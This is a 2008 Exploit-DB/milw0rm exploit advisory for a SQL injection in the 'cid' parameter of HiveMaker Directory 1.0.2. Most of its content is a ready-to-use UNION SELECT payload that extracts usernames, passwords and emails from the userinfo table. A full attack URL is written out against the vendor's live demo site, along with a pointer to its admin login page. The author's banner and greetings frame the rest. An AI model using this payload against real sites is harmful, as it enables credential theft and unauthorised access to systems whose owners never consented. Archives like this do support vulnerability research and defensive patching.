HiveMaker Directory 1.0.2 - 'cid' SQL Injection

EDB-ID:

5928




Platform:

PHP

Date:

2008-06-24


#################################################################################################
####################################  proud to be muslim   ######################################
###                                                                                           ###
###                          rEm0te sql injction VulnErability                                ###
###                                                                                           ###
###                                   Hivemaker script                                        ###
###                                                                                           ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### H0ME   : WwW.alsonaa.CoM                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name :  Hivemaker                                                                  ###
###                                                                                           ###
### download    :  http://www.scriptfactory.org/products.html                                 ###  
###                                                                                           ###
### download    :  http://www.hivemaker.com                                                   ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind "                                                                 ###
### note ::   1-http://www.hivemaker.com/demo/admin/index.php (you can login from here)       ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        index.php?cid=(sql)                                                                ###
###(sql):-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://www.hivemaker.com/demo/sites/index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
::ThE GeNeRal L0s3r::Mr.sql::fa6al error::black cheetah::members of alsonaa.com ::str0ke::MusliMs HaCkErs::
#################################################################################################
#################################################################################################

# milw0rm.com [2008-06-24]